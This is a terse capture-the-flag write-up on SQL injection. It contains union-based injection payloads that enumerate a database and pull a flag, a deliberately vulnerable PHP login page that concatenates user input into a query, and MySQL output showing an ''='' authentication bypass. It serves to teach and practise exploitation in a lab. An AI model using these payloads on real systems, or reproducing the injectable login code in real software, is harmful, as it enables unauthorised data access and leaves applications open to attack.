BCTF-sql_injection

id=1‘ order by 5 #
id=-1‘ union select 1,2,3,4#
id=-1‘ union select 1,database(),user(),version()#
id=-1‘ union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database())#
id=-1‘ union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name=‘fl4g‘)#
id=-1‘ union select 1,2,3,(select skctf_flag from fl4g)#

<html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
    mysql_connect(SAE_MYSQL_HOST_M . ‘:‘ . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = trim($_POST[user]);
  $pass = md5(trim($_POST[pass]));
  $sql="select user from ctf where (user=‘".$user."‘) and (pw=‘".$pass."‘)";
    echo ‘</br>‘.$sql;
  $query = mysql_fetch_array(mysql_query($sql));
  if($query[user]=="admin") {
      echo "<p>Logged in! flag:******************** </p>";
  }
  if($query[user] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}
echo $query[user];
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>

$sql="select user from ctf where (user=‘".$user."‘) and (pw=‘".$pass."‘)"

mysql> select ‘‘=‘‘;
+-------+
| ‘‘=‘‘ |
+-------+
|     1 |
+-------+

mysql> select * from users where username=‘‘=‘‘ and password = ‘‘=‘‘;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
|  3 | test3    | pass1    |
+----+----------+----------+